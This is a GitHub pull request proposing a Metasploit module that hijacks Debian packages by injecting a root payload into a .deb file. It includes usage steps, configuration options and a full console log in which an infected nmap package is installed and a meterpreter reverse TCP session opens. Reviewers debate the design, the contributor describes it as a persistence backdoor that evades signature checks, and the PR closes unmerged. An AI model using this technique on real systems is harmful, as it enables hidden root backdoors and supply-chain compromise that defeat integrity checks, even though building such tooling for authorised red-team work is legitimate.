### PR TITLE
Debian package hijacker

### PR DESCRIPTION
**Pull request by rad10**
## Vulnerable Application

This module exploits the widespread lack of per-package signing
in the Debian package ecosystem. Most `.deb` files are vulnerable
to manipulation if read-write access is available. By injecting a
payload into the package we can gain execution as the root user.
Custom dependencies can also be specified, allowing us to install
additional software. This module can be run with a handler, but it
is not enabled by default.

The exploit module was authored by:

- Andrew Vanderbilt @ Vander Security (Original PoC)
- Nick Cottrell <Rad10Logic> (PoC Additions)

## Verification Steps

 1. Start msfconsole
 2. Get a root session
 3. `use exploit/linux/local/debian_package_hijacker`
 4. `set SESSION <id>`
 5. `set PACKAGE <package_name>` # should be either path to local package or name of apt package
 6. `set DEPENDENCIES <extra_dependencies>`
 7. `set INSTALL_PACKAGE true`
 8. `set DisablePayloadHandler false`
 9. `set ExecuteOnInstall true`
10. `exploit -z`
11. Ensure you have a 2nd root session

## Options

The module provides several configurable options:

- `PACKAGE` (required): The absolute file path to the Debian package
to hijack.

- `INSTALL_PACKAGE` (optional): If set to true, the module will
attempt to install the newly infected package, reinstalling the
package if necessary. Default is `false`.

- `DEPENDENCIES` (optional): Package dependencies to inject into
control file. Separate multiple dependencies with a comma (`,`), e
g., `depends1,depends2`.

- `PAYLOAD_DESTINATION` (optional): Determines where the binary will
be stored. This option is only available when `TARGET` is set to
`Linux dropper`.

- `SUID_PAYLOAD` (optional): If set to true, the payload will have
the SUID bit set so anyone running it will be root. Default is
`true`. This option is only available when `TARGET` is set to
`Linux dropper`.

There are also some advanced options:

- `WritableDir` (required): A directory where temporary files can be
written, default is `/tmp/`.

- `ExecuteOnInstall` (optional): If set to true, the payload will be
executed during installation. Default is `false`. This option is only
available when `TARGET` is set to `Linux dropper`.

## Scenarios

```
msf6 > use exploit/linux/local/debian_package_hijacker
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/debian_package_hijacker) > set session 6 
session => 6
msf6 exploit(linux/local/debian_package_hijacker) > set verbose true 
verbose => true
msf6 exploit(linux/local/debian_package_hijacker) > set package nmap
package => nmap
msf6 exploit(linux/local/debian_package_hijacker) > set install_package true 
install_package => true
msf6 exploit(linux/local/debian_package_hijacker) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/debian_package_hijacker) > set lhost vboxnet0 
lhost => 192.168.56.1
msf6 exploit(linux/local/debian_package_hijacker) > set AllowNoCleanup true 
AllowNoCleanup => true
msf6 exploit(linux/local/debian_package_hijacker) > run

[+] Session confirms it's Debian.
[*] Could not find deb file in PACKAGE path
[+] Found PACKAGE as apt package
[*] Working directory: /tmp/.icfpw36j
[*] postinst_file: /tmp/.icfpw36j/extracted/DEBIAN/postinst.
[*] control_file: /tmp/.icfpw36j/extracted/DEBIAN/control.
[*] Creating directory /tmp/.icfpw36j
[*] /tmp/.icfpw36j created
[*] Could not find package on system, but found it in apt
[*] Package: nmap_7.91+dfsg1+really7.80+dfsg1-2_amd64.deb
[*] Adding /usr/local/bin/notsuspicious to package
[*] Creating directory /tmp/.icfpw36j/extracted/usr
[*] /tmp/.icfpw36j/extracted/usr created
[*] Creating directory /tmp/.icfpw36j/extracted/usr/local
[*] /tmp/.icfpw36j/extracted/usr/local created
[*] Creating directory /tmp/.icfpw36j/extracted/usr/local/bin
[*] /tmp/.icfpw36j/extracted/usr/local/bin created
[*] Generated payload file at usr/local/bin/notsuspicious
[*] Set new binary to proper permissions
[*] New binary digest [b20b40c1ea21325f5dd4431d2a8a446d]
[*] Added new hash to sums
[*] Installing infected package
[*] Running command: apt install -y ./nmap_7.91+dfsg1+really7.80+dfsg1-2_amd64.deb
[*] 
WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

Reading package lists...
Building dependency tree...
Reading state information...
The following additional packages will be installed:
  liblinear4 nmap-common
Suggested packages:
  liblinear-tools liblinear-dev ncat ndiff zenmap
The following NEW packages will be installed:
  liblinear4 nmap nmap-common
0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
Need to get 4060 kB/5960 kB of archives.
After this operation, 25.9 MB of additional disk space will be used.
Get:1 /home/radmin/nmap_7.91+dfsg1+really7.80+dfsg1-2_amd64.deb nmap amd64 7.91+dfsg1+really7.80+dfsg1-2 [1899 kB]
Get:2 http://deb.debian.org/debian bullseye/main amd64 liblinear4 amd64 2.3.0+dfsg-5 [43.6 kB]
Get:3 http://deb.debian.org/debian bullseye/main amd64 nmap-common all 7.91+dfsg1+really7.80+dfsg1-2 [4017 kB]
debconf: unable to initialize frontend: Dialog
debconf: (TERM is not set, so the dialog frontend is not usable.)
debconf: falling back to frontend: Readline
debconf: unable to initialize frontend: Readline
debconf: (This frontend requires a controlling tty.)
debconf: falling back to frontend: Teletype
dpkg-preconfigure: unable to re-open stdin: 
Fetched 4060 kB in 1s (6302 kB/s)
Selecting previously unselected package liblinear4:amd64.
(Reading database ... 261904 files and directories currently installed.)
Preparing to unpack .../liblinear4_2.3.0+dfsg-5_amd64.deb ...
Unpacking liblinear4:amd64 (2.3.0+dfsg-5) ...
Selecting previously unselected package nmap-common.
Preparing to unpack .../nmap-common_7.91+dfsg1+really7.80+dfsg1-2_all.deb ...
Unpacking nmap-common (7.91+dfsg1+really7.80+dfsg1-2) ...
Selecting previously unselected package nmap.
Preparing to unpack .../nmap_7.91+dfsg1+really7.80+dfsg1-2_amd64.deb ...
Unpacking nmap (7.91+dfsg1+really7.80+dfsg1-2) ...
Setting up liblinear4:amd64 (2.3.0+dfsg-5) ...
Setting up nmap-common (7.91+dfsg1+really7.80+dfsg1-2) ...
Setting up nmap (7.91+dfsg1+really7.80+dfsg1-2) ...
Processing triggers for man-db (2.9.4-2) ...
[*] Package installed. Marking downloaded package for deletion.
msf6 exploit(linux/local/debian_package_hijacker) > use payload/linux/x64/meterpreter/reverse_tcp 
msf6 payload(linux/x64/meterpreter/reverse_tcp) > set lhost vboxnet0 
lhost => 192.168.56.1
msf6 payload(linux/x64/meterpreter/reverse_tcp) > exploit -z
[*] Payload Handler Started as Job 3
msf6 payload(linux/x64/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.56.1:4444 
sessions -i 6 -c /usr/local/bin/notsuspicious
[*] Running '/usr/local/bin/notsuspicious' on meterpreter session 6 (192.168.56.126)
[*] Sending stage (3045348 bytes) to 192.168.56.126
[*] Meterpreter session 7 opened (192.168.56.1:4444 -> 192.168.56.126:37788) at 2023-07-17 16:40:37 -0400
[*] This is CredCollect, I have the conn!
```

### CODE REVIEW

**Comment by jemartin-r7** [comment]
Complete shit.

**Comment by sempervictus** [comment]
This seems more like a file format exploit...
The level of indirection required for the kill chain obviates the post/local paradigm: if the attacker has privs to execute package installation on a remote system, then they get EOP context to use however they want. Running a payload privileged in that context is just one of the things one can do, but they can just as easily spawn a local privileged shell.

**Comment by sempervictus** [comment]
> > This seems more like a file format exploit... The level of indirection required for the kill chain obviates the post/local paradigm: if the attacker has privs to execute package installation on a remote system, then they get EOP context to use however they want. Running a payload privileged in that context is just one of the things one can do, but they can just as easily spawn a local privileged shell.
> 
> thats all true. In reality this is more of a backdoor than an actual exploit. It could be useful for systems where unprivileged users can install packages.

Agreed, which is why i'm proposing rewriting the module to be a file format exploit vs a "local" one since allowing users to install packages is generally "not a thing" but leaving behind "fu-filled" debs is :).

-Boris

File: documentation/modules/exploit/linux/fileformat/debian_package_hijacker.md [hunk 1]
```diff
@@ -0,0 +1,161 @@
...
+10. `exploit -z`
+11. Ensure you have a 2nd root session
+
+
+## Options
+
+The module provides several configurable options:
+
+- `PACKAGE` (required): The absolute file path to the Debian package
+to hijack.
```
Comment (adfoster-r7) [inline documentation/modules/exploit/linux/fileformat/debian_package_hijacker.md:36]: Can we update this to the markdown format as shown here: https://github.com/rapid7/metasploit-framework/blob/b4991a97d02572a323470aa0906e934cce1b7843/documentation/modules/module_doc_template.md#L20-L25

File: modules/exploits/linux/fileformat/debian_package_hijacker.rb [hunk 2]
```diff
@@ -0,0 +1,346 @@
...
+          }
+        },
+        'DefaultOptions' => { 'DisablePayloadHandler' => true },
+        'Privileged' => true,
+        'DisclosureDate' => '2023-03-25',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ], # Won't crash, but may fail parsing.
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], # The APT log and installed packages list will indicate any dependencies we inject. Also the shell log for the package scripts.
+          'Reliability' => [ REPEATABLE_SESSION ] # Infect as many pacakges as you want. Worst case the shell can't bind the port if multiple are active.
+        }
```
Comment (adfoster-r7) [inline modules/exploits/linux/fileformat/debian_package_hijacker.rb:84]: Can we add a link to the resources/relevant PoCs and documentation that were used when implementing this module :+1:

Comment (andrew-vanderbilt) [reply modules/exploits/linux/fileformat/debian_package_hijacker.rb:88]: The only reference used was the Debian package spec. I pushed a commit adding a URL reference.

**Comment by rad10** [comment]
> > > This seems more like a file format exploit... The level of indirection required for the kill chain obviates the post/local paradigm: if the attacker has privs to execute package installation on a remote system, then they get EOP context to use however they want. Running a payload privileged in that context is just one of the things one can do, but they can just as easily spawn a local privileged shell.
> > 
> > 
> > thats all true. In reality this is more of a backdoor than an actual exploit. It could be useful for systems where unprivileged users can install packages.
> 
> Agreed, which is why i'm proposing rewriting the module to be a file format exploit vs a "local" one since allowing users to install packages is generally "not a thing" but leaving behind "fun-filled" debs is :)

I like the idea. It should be a format exploit now

**Comment by sempervictus** [comment]
Neat, thank you. Now if we do find a system letting us do such fun things unprivileged, we can just serve up a deb.

**Comment by rad10** [comment]
Awesome. It says there are 3 workflows waiting approval. Is that something I need to deal with, or are we good to land?

**Review by andrew-vanderbilt — APPROVED** [review]

**Comment by rad10** [comment]
Hey could we get another checkup on this?

**Review by jheysel-r7 — COMMENTED** [review]
Hey @rad10, a couple comments. Mainly I'm not sure it makes sense to add a module that requires root access in order to spawn a second root session. However I think if we made some changes so that it focuses on how an unprivileged user can exploit this technique on vulnerable systems to gain root access that would be really great! Let me know if you have any questions.

**Comment by bwatters-r7** [comment]
@rad10 any updates here?  I think the general question here was that as a fileformat exploit, we're making something as an unprivileged user that can be executed later as a privileged user, so that's what we should be targeting with both options and documentation; basically the goal is making a file that someone else with a higher privilege will run.

**Comment by rad10** [comment]
> @rad10 any updates here? I think the general question here was that as a fileformat exploit, we're making something as an unprivileged user that can be executed later as a privileged user, so that's what we should be targeting with both options and documentation; basically the goal is making a file that someone else with a higher privilege will run.

Hi. Sorry for the week long delay. So yes, this modules is meant to repackage a payload into a benign package with the intent of installing it, either immediately or in the future. For this modules ultimate purpose it needs to run as root, but it is able to run without root for flexibility in a campaign. What this module ultimately does is make a backdoor and attempt to hide said backdoor by adding it into the package itself.

For classic pen-tests, this module serves no purpose, but for persistence in other operations like a CCDC event this would be majorly valuable. For example, I was red teaming for a CCDC competition last week and put a PAM backdoor into competitors machines. They were able to take it off by checking the signatures of the files compared to their package. If I used the module, their checks would have passed even though I implanted a backdoor.

Not sure how you want to categorize it with that in mind, but whatever y'all decide, I'll accommodate to it.

**Comment by smcintyre-r7** [comment]
So this module is under the `fileformat` directory now but it's still implemented as a Local exploit that requires a session to run. To be a file format exploit as @sempervictus suggested, it should be able to run without a session at all. It should take a debian package as an input, infect it and write it to disk for the user. That's the pattern that file format exploits use.

Having said that, there's *a lot* of code that needs to be removed and/or rewritten.

Just from eyeballing this:

* All of the documentation's Scenario section needs to be regenerated
* The `#check_package?` function needs to be removed because you can't execute commands on a target via a session in a file format exploit
* The `#check_platform` function needs to be removed for the same reason
* The `#check_installable` function needs to be removed for the same reason
* The `#check` method needs to be removed
* The `#inject_file` method needs to be rewritten to inject into a local .deb file, not a remote one because again, there's no session
* The `#exploit` method needs to be rewritten to infect the file and then exit, no installation, permission changes or anything else like that

If and when you rewrite this, it's important to remember that Metasploit shouldn't be shelling out to external commands, so you'll need to do the .deb file manipulation in pure Ruby. This will ensure the module works on all systems that Metasploit runs on including Windows.

**Comment by rad10** [comment]
Understood. I'll get on it!

**Comment by smcintyre-r7** [comment]
Alright, there's no rush on this but I'm going to attic this PR until such time that you're able to get back to it. When that time comes, just tag me and I'll get it reopened and take a look at the latest changes.

Thanks!

**Pull request closed without merging**